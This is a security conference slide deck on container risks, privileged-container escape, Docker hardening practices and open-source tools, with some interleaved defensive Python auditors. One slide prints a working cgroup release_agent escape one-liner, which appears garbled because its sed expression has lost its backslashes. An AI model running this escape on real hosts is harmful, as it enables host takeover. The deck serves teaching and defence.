Container Security
Jie @ InfoSec2020
Nov/02/2020
curl -X GET https://2130706433/info
{
  "Name": "Jie",
  "Experience": [
    "IBM Security",
    "Qualcomm",
    "National Center of High-Performance Computing"],
  "Certification": [
    "CCIE #50382",
    "OSCP",
    "CEH"]
}
https://www.linkedin.com/in/jieliau
https://github.com/jieliau
https://www.facebook.com/jie.liau
https://twitter.com/0xJieLiau
https://medium.com/@liau.weijie
Gartner predicts that by 2023, 70% of organizations will be running three or more containerized applications in production
?
Virtual Machine stack (bottom to top): Infrastructure > Hypervisor > Guest OS | Guest OS | Guest OS > Bin/Lib | Bin/Lib | Bin/Lib > App1 | App2 | App2 (three Virtual Machines, each with its own Guest OS)
Container stack (bottom to top): Infrastructure > Host OS > Container Engine > Bin/Lib | Bin/Lib | Bin/Lib > App1 | App2 | App3 (three Containerized Applications sharing the host kernel)
Open Container Initiative - OCI
• Runtime Spec
• namespace
• cgroups
• Image Spec
• Layer
• Image index
• Configuration
Container Security
Security Issues
Image Risks
•Image vulnerabilities
•Image configuration
•Embedded malware
•Embedded secrets
•Image trust
Registry Risks
•Insecure connections to registries
•Stale images in registries
Orchestration System Risks
•Unbounded admin access
•Weak or unmanaged credentials
•Unmanaged inter-container network traffic
•Mixing of workload sensitivity levels
Container Runtime Risks
•Vulnerabilities within the runtime software
•Unbounded network access from containers
•Insecure container runtime configurations
Host OS Risks
•Improper user access rights
•OS vulnerabilities
•Shared kernel
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-190.pdf
Container escape to the host
Container should not run as root
Use non-root user in your Dockerfile
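The slide's rule is easy to check mechanically before an image is ever built. The following checker is an added example, not code from the slides or from any project they cite; it reads a Dockerfile's text and reports whether the final USER is root (or missing), plus a few related points from the later best-practices list: unpinned or `latest` base images, secret-looking ENV/ARG keys, sshd being installed, and EXPOSE of ports below 1024. Both Dockerfiles below are constructed samples, and the secret-key regex and "privileged port" threshold are this example's own choices.

```python
"""Added example: static checks for the non-root USER rule and related image hygiene."""
import re
from typing import Iterator, List, Tuple

# Constructed sample: a Dockerfile that breaks several of the rules on these slides.
BAD_DOCKERFILE = """\
FROM ubuntu:latest
ENV DB_PASSWORD=hunter2
RUN apt-get update && apt-get install -y openssh-server
EXPOSE 22
CMD ["python3", "app.py"]
"""

# Constructed sample: the same workload written the way the slides recommend
# (pinned base image, dedicated UID, no secrets, unprivileged port).
GOOD_DOCKERFILE = """\
FROM python:3.11-slim@sha256:0000000000000000000000000000000000000000000000000000000000000000
RUN useradd --system --uid 10001 app
COPY --chown=app:app app.py /app/app.py
USER 10001
EXPOSE 8080
CMD ["python3", "/app/app.py"]
"""

# Assumption of this example: ENV/ARG names matching this pattern are treated as secrets.
SECRET_KEY_RE = re.compile(r"(PASSWORD|PASSWD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)", re.I)


def _instructions(dockerfile: str) -> Iterator[Tuple[str, str]]:
    """Yield (INSTRUCTION, argument) pairs, joining backslash line continuations."""
    buf = ""
    for raw in dockerfile.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        parts = buf.split(None, 1)
        buf = ""
        yield parts[0].upper(), (parts[1] if len(parts) > 1 else "")


def check_dockerfile(dockerfile: str) -> List[str]:
    """Return a list of findings; an empty list means the Dockerfile passes every check."""
    findings: List[str] = []
    last_user = None
    for instr, arg in _instructions(dockerfile):
        if instr == "FROM":
            image = arg.split()[0]  # drop an "AS stage" suffix
            unpinned = "@sha256:" not in image and (":" not in image or image.endswith(":latest"))
            if image != "scratch" and unpinned:
                findings.append(f"FROM {image}: base image is unpinned (use a tag or digest, not latest)")
        elif instr == "USER":
            last_user = arg.strip()  # the last USER instruction decides the runtime identity
        elif instr in ("ENV", "ARG"):
            if SECRET_KEY_RE.search(arg):
                findings.append(f"{instr} {arg.split('=')[0]}: looks like a secret baked into the image")
        elif instr == "EXPOSE":
            for port in arg.split():
                if int(port.split("/")[0]) < 1024:
                    findings.append(f"EXPOSE {port}: privileged port (<1024)")
        elif instr == "RUN" and re.search(r"\b(openssh-server|sshd)\b", arg):
            findings.append("RUN installs sshd: do not run sshd inside containers")
    # No USER, or USER root / 0, means every process in the container runs as UID 0.
    if last_user is None or last_user.split(":")[0] in ("root", "0"):
        findings.append("no non-root USER set: the container will run as UID 0")
    return findings


if __name__ == "__main__":
    for name, text in (("bad", BAD_DOCKERFILE), ("good", GOOD_DOCKERFILE)):
        print(name, check_dockerfile(text) or "OK")
```

A numeric UID in USER (as in the good sample) is deliberate: Kubernetes' `runAsNonRoot` can only verify a numeric UID, and a username that resolves to 0 inside the image would slip past a name-based check.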
Privileged Container is so Bad
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
https://twitter.com/_fel1x/status/1151487051986087936
(diagram labels: Docker host, Client Host, Geek, Bad Image, Open Docker API)
Attack Scenario I: Vulnerable Container
1. Attack vulnerable container
2. Compromise the host (Docker Host or K8s Cluster)
Attack Scenario II: Bad Container
1. Push bad image
2. Deploy by admin
3. Create bad container (Docker Host or K8s cluster)
Attack Scenario III: Privileged Container
1. Find out open docker host
2. Create privileged container
3. Compromise the host (Open Docker Host)
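Scenario III starts from a Docker daemon whose API is reachable over plain TCP. The check below is an added example, not part of the slides; it parses a daemon.json and flags a `hosts` entry that listens on `tcp://` without `tlsverify`, and shows the weak configuration next to the corrected one. Both JSON documents are constructed samples; the certificate paths in the hardened one are placeholders.

```python
"""Added example: find an API listener exposed over TCP without TLS in daemon.json."""
import json
from typing import List

# Constructed: the weak configuration, API on every interface with no TLS at all.
WEAK_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
"""

# Constructed: the corrected configuration, TLS with client-certificate verification
# (tlsverify) so only holders of a certificate signed by the CA can call the API.
HARDENED_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
"""


def audit_daemon_config(text: str) -> List[str]:
    """Return findings for a daemon.json; an empty list means no TCP exposure issue."""
    cfg = json.loads(text)
    findings: List[str] = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings  # unix socket only: reachable just by root and the docker group
    tls_on = cfg.get("tlsverify") is True
    for h in tcp_hosts:
        if not tls_on:
            findings.append(f"{h}: Docker API reachable over TCP without TLS client verification")
            if "://0.0.0.0:" in h or "://[::]:" in h:
                findings.append(f"{h}: listener bound to all interfaces")
    if tls_on:
        # tlsverify without the certificate files makes the daemon fail to start.
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                findings.append(f"tlsverify is set but {key} is missing")
    return findings


if __name__ == "__main__":
    print("weak:", audit_daemon_config(WEAK_DAEMON_JSON))
    print("hardened:", audit_daemon_config(HARDENED_DAEMON_JSON) or "OK")
```

Note that `hosts` in daemon.json conflicts with a `-H` flag passed on the dockerd command line (the stock systemd unit does this), so the setting has to live in one place or the daemon refuses to start; a client that can reach the API with a valid certificate still has root-equivalent control of the host, so TLS limits who can connect, not what they can do.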
Bad Image for Cryptocurrency Mining
https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining
Kinsing Malware Attacks Targeting Container Env
https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
Container Security
Best Practices
• Always use the most up to date version of Docker
• Allow only trusted users control of the Docker daemon by making sure only trusted users are members of Docker group
• Run your containers as a non-root user (UID not 0)
• Use only trusted base images when building your containers
• Use minimal base images that don’t include unnecessary software packages that could lead to a larger attack surface
• Don’t store secrets in images/Dockerfiles
• When running containers, remove all capabilities not required for the container to function as needed
• Don’t run containers with --privileged flag
• Don’t mount sensitive host system directories on containers, especially in writable mode that could expose them to being changed maliciously in a way that could lead to host compromise
• Don’t run sshd within containers
• Don’t map any ports below 1024 within a container as they are considered privileged because they transmit sensitive data
• Make sure you have rules in place that give you an audit trail for:
• Docker daemon and Docker files and directories:
• /var/lib/docker
• /etc/docker
• docker.service
• docker.socket
• /etc/default/docker
• /etc/docker/daemon.json
• /etc/sysconfig/docker
• /usr/bin/containerd
• /usr/sbin/runc
https://www.stackrox.com/post/2019/09/docker-security-101/
CAP-ADD instead of Privileged
• --cap-add
• SYS_ADMIN
• NET_ADMIN
• MAC_ADMIN
• NET_RAW
• SYS_TIME
• SYSLOG
• …
https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
Limit Resource Usage
• --memory
• --cpus
• --cpu-period
• --pids-limit
• --kernel-memory
• --device-read-bps
• --device-read-iops
• --device-write-bps
• --device-write-iops
https://docs.docker.com/config/containers/resource_constraints/
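The runtime rules on the last three slides (no --privileged, a minimal --cap-add set, no writable mounts of sensitive host paths, and memory/CPU/PID limits) can be verified on a running container from the HostConfig section of `docker inspect`. The auditor below is an added example, not code from the slides or from Docker; the two HostConfig objects are constructed to mirror the field names `docker inspect` emits (Privileged, CapAdd, CapDrop, Binds, Memory, NanoCpus, PidsLimit) and include only those fields. The sensitive-path list and the set of capabilities treated as high-impact are this example's own choices, drawn from the --cap-add slide.

```python
"""Added example: audit a container's HostConfig against the slides' runtime rules."""
from typing import Dict, List

# Assumption of this example: host paths that should not be mounted into containers.
SENSITIVE_HOST_PATHS = ("/etc", "/boot", "/dev", "/proc", "/sys",
                        "/var/run/docker.sock", "/run/docker.sock", "/var/lib/docker")

# Assumption of this example: capabilities that are close to host-level when granted.
DANGEROUS_CAPS = {"SYS_ADMIN", "NET_ADMIN", "MAC_ADMIN", "NET_RAW", "SYS_TIME",
                  "SYSLOG", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH"}

# Constructed: a container started with --privileged, the host root mounted writable,
# the Docker socket mounted, and no resource limits at all.
RISKY_HOSTCONFIG: Dict = {
    "Privileged": True,
    "CapAdd": None,
    "CapDrop": None,
    "Binds": ["/:/host:rw", "/var/run/docker.sock:/var/run/docker.sock"],
    "Memory": 0, "NanoCpus": 0, "PidsLimit": None,
}

# Constructed: the same workload with an explicit minimal grant and limits, i.e.
# --cap-drop ALL --cap-add NET_BIND_SERVICE --memory 512m --cpus 1 --pids-limit 200.
HARDENED_HOSTCONFIG: Dict = {
    "Privileged": False,
    "CapAdd": ["NET_BIND_SERVICE"],
    "CapDrop": ["ALL"],
    "Binds": ["/srv/app/data:/data:ro"],
    "Memory": 512 * 1024 * 1024, "NanoCpus": 1_000_000_000, "PidsLimit": 200,
}


def _mount_is_sensitive(bind: str) -> bool:
    """True when the source of a 'src:dst[:opts]' bind is the host root or a listed path."""
    src = bind.split(":")[0]
    if src == "/":
        return True
    return any(src == p or src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def _mount_is_writable(bind: str) -> bool:
    """A bind is writable unless its options field contains 'ro'."""
    parts = bind.split(":")
    return len(parts) < 3 or "ro" not in parts[2].split(",")


def audit_hostconfig(hc: Dict) -> List[str]:
    """Return findings for one container's HostConfig; empty means it passes."""
    findings: List[str] = []
    if hc.get("Privileged"):
        findings.append("Privileged=true: replace with --cap-add of the specific capabilities needed")
    if "ALL" not in (hc.get("CapDrop") or []):
        findings.append("CapDrop does not include ALL: default capability set is not reduced")
    for cap in hc.get("CapAdd") or []:
        if cap.upper().removeprefix("CAP_") in DANGEROUS_CAPS:
            findings.append(f"CapAdd {cap}: high-impact capability, justify or remove")
    for bind in hc.get("Binds") or []:
        if _mount_is_sensitive(bind):
            mode = "writable" if _mount_is_writable(bind) else "read-only"
            findings.append(f"Binds {bind}: sensitive host path mounted {mode}")
    if not hc.get("Memory"):
        findings.append("Memory limit not set (--memory)")
    if not hc.get("NanoCpus"):
        findings.append("CPU limit not set (--cpus)")
    if not hc.get("PidsLimit"):
        findings.append("PID limit not set (--pids-limit)")
    return findings


if __name__ == "__main__":
    print("risky:", *audit_hostconfig(RISKY_HOSTCONFIG), sep="\n  ")
    print("hardened:", audit_hostconfig(HARDENED_HOSTCONFIG) or "OK")
```

To run it against a live host, feed each element of `docker inspect $(docker ps -q)` (a JSON array) through `audit_hostconfig(entry["HostConfig"])`; the Docker socket is flagged even when mounted read-only because the API behind it accepts writes regardless of the mount mode.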
Open Source Tools for Docker Security
• Docker Bench for Security
• Clair
• Cilium
• Anchore
• OpenSCAP Workbench
• Dagda
• Notary
• Grafeas
• Sysdig Falco
• Banyanops Collector
https://techbeacon.com/security/10-top-open-source-tools-docker-security
Container Security
Container Visibility is So Damn Important
https://blog.gigamon.com/2019/09/19/if-you-dont-have-container-visibility-your-organization-is-at-risk/
https://github.com/sysflow-telemetry
References
• https://www.stackrox.com/post/2020/03/6-container-adoption-trends-of-2020/
• https://www.docker.com/blog/containers-replacing-virtual-machines/
• https://blog.aquasec.com/cve-2016-9962-run-container-run
• https://medium.com/@mccode/processes-in-containers-should-not-run-as-root-2feae3f0df3b
• https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/
• https://docs.docker.com/engine/api/
• https://docs.docker.com/engine/api/v1.40/#operation/ContainerCreate
• https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining
• https://docs.docker.com/config/containers/resource_constraints/
• https://techbeacon.com/security/10-top-open-source-tools-docker-security
Thank You!!!

More Related Content

What's hot

K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practices
Sharon Vendrov
 
Introduction to container based virtualization with docker
Introduction to container based virtualization with dockerIntroduction to container based virtualization with docker
Introduction to container based virtualization with docker
Bangladesh Network Operators Group
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container Security
Phil Estes
 
Docker internals
Docker internalsDocker internals
Docker internals
Rohit Jnagal
 
Docker Introduction
Docker IntroductionDocker Introduction
Docker Introduction
Jeffrey Ellin
 
Docker Online Meetup #22: Docker Networking
Docker Online Meetup #22: Docker NetworkingDocker Online Meetup #22: Docker Networking
Docker Online Meetup #22: Docker Networking
Docker, Inc.
 
Kubernetes and container security
Kubernetes and container securityKubernetes and container security
Kubernetes and container security
Volodymyr Shynkar
 
Container Security
Container SecurityContainer Security
Container Security
Amazon Web Services
 
Introducing Vault
Introducing VaultIntroducing Vault
Introducing Vault
Ramit Surana
 
Docker and the Linux Kernel
Docker and the Linux KernelDocker and the Linux Kernel
Docker and the Linux Kernel
Docker, Inc.
 
Alphorm.com Formation Kubernetes : Installation et Configuration
Alphorm.com Formation Kubernetes : Installation et ConfigurationAlphorm.com Formation Kubernetes : Installation et Configuration
Alphorm.com Formation Kubernetes : Installation et Configuration
Alphorm
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
Docker, Inc.
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
RyanISI
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
Aqua Security
 
Midi technique - présentation docker
Midi technique - présentation dockerMidi technique - présentation docker
Midi technique - présentation docker
Olivier Eeckhoutte
 
Kubernetes - introduction
Kubernetes - introductionKubernetes - introduction
Kubernetes - introduction
Sparkbit
 
A Hands-On Introduction To Docker Containers.pdf
A Hands-On Introduction To Docker Containers.pdfA Hands-On Introduction To Docker Containers.pdf
A Hands-On Introduction To Docker Containers.pdf
Edith Puclla
 
Docker 101
Docker 101Docker 101
Docker 101
Lâm Đào
 
Docker introduction
Docker introductionDocker introduction
Docker introduction
Phuc Nguyen
 
Docker
DockerDocker

What's hot (20)

K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practices
 
Introduction to container based virtualization with docker
Introduction to container based virtualization with dockerIntroduction to container based virtualization with docker
Introduction to container based virtualization with docker
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container Security
 
Docker internals
Docker internalsDocker internals
Docker internals
 
Docker Introduction
Docker IntroductionDocker Introduction
Docker Introduction
 
Docker Online Meetup #22: Docker Networking
Docker Online Meetup #22: Docker NetworkingDocker Online Meetup #22: Docker Networking
Docker Online Meetup #22: Docker Networking
 
Kubernetes and container security
Kubernetes and container securityKubernetes and container security
Kubernetes and container security
 
Container Security
Container SecurityContainer Security
Container Security
 
Introducing Vault
Introducing VaultIntroducing Vault
Introducing Vault
 
Docker and the Linux Kernel
Docker and the Linux KernelDocker and the Linux Kernel
Docker and the Linux Kernel
 
Alphorm.com Formation Kubernetes : Installation et Configuration
Alphorm.com Formation Kubernetes : Installation et ConfigurationAlphorm.com Formation Kubernetes : Installation et Configuration
Alphorm.com Formation Kubernetes : Installation et Configuration
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
 
Midi technique - présentation docker
Midi technique - présentation dockerMidi technique - présentation docker
Midi technique - présentation docker
 
Kubernetes - introduction
Kubernetes - introductionKubernetes - introduction
Kubernetes - introduction
 
A Hands-On Introduction To Docker Containers.pdf
A Hands-On Introduction To Docker Containers.pdfA Hands-On Introduction To Docker Containers.pdf
A Hands-On Introduction To Docker Containers.pdf
 
Docker 101
Docker 101Docker 101
Docker 101
 
Docker introduction
Docker introductionDocker introduction
Docker introduction
 
Docker
DockerDocker
Docker
 

Similar to Container Security

Container Days: Hijack a Kubernetes Cluster - a Walkthrough
Container Days: Hijack a Kubernetes Cluster - a WalkthroughContainer Days: Hijack a Kubernetes Cluster - a Walkthrough
Container Days: Hijack a Kubernetes Cluster - a Walkthrough
Nico Meisenzahl
 
ContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack KubernetesContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack Kubernetes
Nico Meisenzahl
 
Hijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a WalkthroughHijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a Walkthrough
Nico Meisenzahl
 
Develop Azure compute solutions Part - 2
Develop Azure compute solutions Part - 2Develop Azure compute solutions Part - 2
Develop Azure compute solutions Part - 2
AzureEzy1
 
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Security Patterns for Microservice Architectures - ADTMag Microservices & API...Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Matt Raible
 
Secure your Azure Web App 2019
Secure your Azure Web App 2019Secure your Azure Web App 2019
Secure your Azure Web App 2019
Frans Lytzen
 
Hijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a WalkthroughHijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a Walkthrough
Nico Meisenzahl
 
Tips and best practices for Docker
Tips and best practices for DockerTips and best practices for Docker
Tips and best practices for Docker
Calidad Infotech
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentation
Frans Lytzen
 
Security Patterns for Microservice Architectures - London Java Community 2020
Security Patterns for Microservice Architectures - London Java Community 2020Security Patterns for Microservice Architectures - London Java Community 2020
Security Patterns for Microservice Architectures - London Java Community 2020
Matt Raible
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
Gianluca Varisco
 
Contain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidenceContain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidence
Black Duck by Synopsys
 
Security Patterns for Microservice Architectures - Oktane20
Security Patterns for Microservice Architectures - Oktane20Security Patterns for Microservice Architectures - Oktane20
Security Patterns for Microservice Architectures - Oktane20
Matt Raible
 
Native Cloud-Native: Building Agile Microservices with the Micronaut Framework
Native Cloud-Native: Building Agile Microservices with the Micronaut FrameworkNative Cloud-Native: Building Agile Microservices with the Micronaut Framework
Native Cloud-Native: Building Agile Microservices with the Micronaut Framework
Zachary Klein
 
Microservices in the Enterprise
Microservices in the Enterprise Microservices in the Enterprise
Microservices in the Enterprise
Jesus Rodriguez
 
How to Prevent Your Kubernetes Cluster From Being Hacked
How to Prevent Your Kubernetes Cluster From Being HackedHow to Prevent Your Kubernetes Cluster From Being Hacked
How to Prevent Your Kubernetes Cluster From Being Hacked
Nico Meisenzahl
 
Secure Your Code Implement DevSecOps in Azure
Secure Your Code Implement DevSecOps in AzureSecure Your Code Implement DevSecOps in Azure
Secure Your Code Implement DevSecOps in Azure
kloia
 
Finding Your Way in Container Security
Finding Your Way in Container SecurityFinding Your Way in Container Security
Finding Your Way in Container Security
Ksenia Peguero
 
Understanding docker ecosystem and vulnerabilities points
Understanding docker ecosystem and vulnerabilities pointsUnderstanding docker ecosystem and vulnerabilities points
Understanding docker ecosystem and vulnerabilities points
Abdul Khan
 
Docker Security
Docker SecurityDocker Security
Docker Security
antitree
 

Similar to Container Security (20)

Container Days: Hijack a Kubernetes Cluster - a Walkthrough
Container Days: Hijack a Kubernetes Cluster - a WalkthroughContainer Days: Hijack a Kubernetes Cluster - a Walkthrough
Container Days: Hijack a Kubernetes Cluster - a Walkthrough
 
ContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack KubernetesContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack Kubernetes
 
Hijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a WalkthroughHijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a Walkthrough
 
Develop Azure compute solutions Part - 2
Develop Azure compute solutions Part - 2Develop Azure compute solutions Part - 2
Develop Azure compute solutions Part - 2
 
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Security Patterns for Microservice Architectures - ADTMag Microservices & API...Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
 
Secure your Azure Web App 2019
Secure your Azure Web App 2019Secure your Azure Web App 2019
Secure your Azure Web App 2019
 
Hijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a WalkthroughHijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a Walkthrough
 
Tips and best practices for Docker
Tips and best practices for DockerTips and best practices for Docker
Tips and best practices for Docker
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentation
 
Security Patterns for Microservice Architectures - London Java Community 2020
Security Patterns for Microservice Architectures - London Java Community 2020Security Patterns for Microservice Architectures - London Java Community 2020
Security Patterns for Microservice Architectures - London Java Community 2020
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
 
Contain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidenceContain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidence
 
Security Patterns for Microservice Architectures - Oktane20
Security Patterns for Microservice Architectures - Oktane20Security Patterns for Microservice Architectures - Oktane20
Security Patterns for Microservice Architectures - Oktane20
 
Native Cloud-Native: Building Agile Microservices with the Micronaut Framework
Native Cloud-Native: Building Agile Microservices with the Micronaut FrameworkNative Cloud-Native: Building Agile Microservices with the Micronaut Framework
Native Cloud-Native: Building Agile Microservices with the Micronaut Framework
 
Microservices in the Enterprise
Microservices in the Enterprise Microservices in the Enterprise
Microservices in the Enterprise
 
How to Prevent Your Kubernetes Cluster From Being Hacked
How to Prevent Your Kubernetes Cluster From Being HackedHow to Prevent Your Kubernetes Cluster From Being Hacked
How to Prevent Your Kubernetes Cluster From Being Hacked
 
Secure Your Code Implement DevSecOps in Azure
Secure Your Code Implement DevSecOps in AzureSecure Your Code Implement DevSecOps in Azure
Secure Your Code Implement DevSecOps in Azure
 
Finding Your Way in Container Security
Finding Your Way in Container SecurityFinding Your Way in Container Security
Finding Your Way in Container Security
 
Understanding docker ecosystem and vulnerabilities points
Understanding docker ecosystem and vulnerabilities pointsUnderstanding docker ecosystem and vulnerabilities points
Understanding docker ecosystem and vulnerabilities points
 
Docker Security
Docker SecurityDocker Security
Docker Security
 

More from Jie Liau

iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWebiThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
Jie Liau
 
OWASPAPISecurity
OWASPAPISecurityOWASPAPISecurity
OWASPAPISecurity
Jie Liau
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPI
Jie Liau
 
iThome CyberSec2021 Container Security
iThome CyberSec2021 Container SecurityiThome CyberSec2021 Container Security
iThome CyberSec2021 Container Security
Jie Liau
 
Protecting Your Internet Route Integrity
Protecting Your Internet Route IntegrityProtecting Your Internet Route Integrity
Protecting Your Internet Route Integrity
Jie Liau
 
The Tor Network
The Tor NetworkThe Tor Network
The Tor Network
Jie Liau
 
IBM X-Force Threat Intelligence Index 2017
IBM X-Force Threat Intelligence Index 2017IBM X-Force Threat Intelligence Index 2017
IBM X-Force Threat Intelligence Index 2017
Jie Liau
 
DDoS
DDoSDDoS
DDoS
Jie Liau
 
Shell Shock
Shell ShockShell Shock
Shell Shock
Jie Liau
 

More from Jie Liau (9)

iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWebiThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
 
OWASPAPISecurity
OWASPAPISecurityOWASPAPISecurity
OWASPAPISecurity
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPI
 
iThome CyberSec2021 Container Security
iThome CyberSec2021 Container SecurityiThome CyberSec2021 Container Security
iThome CyberSec2021 Container Security
 
Protecting Your Internet Route Integrity
Protecting Your Internet Route IntegrityProtecting Your Internet Route Integrity
Protecting Your Internet Route Integrity
 
The Tor Network
The Tor NetworkThe Tor Network
The Tor Network
 
IBM X-Force Threat Intelligence Index 2017
IBM X-Force Threat Intelligence Index 2017IBM X-Force Threat Intelligence Index 2017
IBM X-Force Threat Intelligence Index 2017
 
DDoS
DDoSDDoS
DDoS
 
Shell Shock
Shell ShockShell Shock
Shell Shock
 

Recently uploaded

(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
Priyanka Aash
 
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptxDublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Kunal Gupta
 
What's new in android: jetpack compose 2024
What's new in android: jetpack compose 2024What's new in android: jetpack compose 2024
What's new in android: jetpack compose 2024
Toru Wonyoung Choi
 
Mastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for SuccessMastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for Success
David Wilson
 
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
Priyanka Aash
 
Semantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software DevelopmentSemantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software Development
Baishakhi Ray
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
shanihomely
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
SynapseIndia
 
Introduction-to-the-IAM-Platform-Implementation-Plan.pptx
Introduction-to-the-IAM-Platform-Implementation-Plan.pptxIntroduction-to-the-IAM-Platform-Implementation-Plan.pptx
Introduction-to-the-IAM-Platform-Implementation-Plan.pptx
313mohammedarshad
 
WhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring AppsWhatsApp Spy Online Trackers and Monitoring Apps
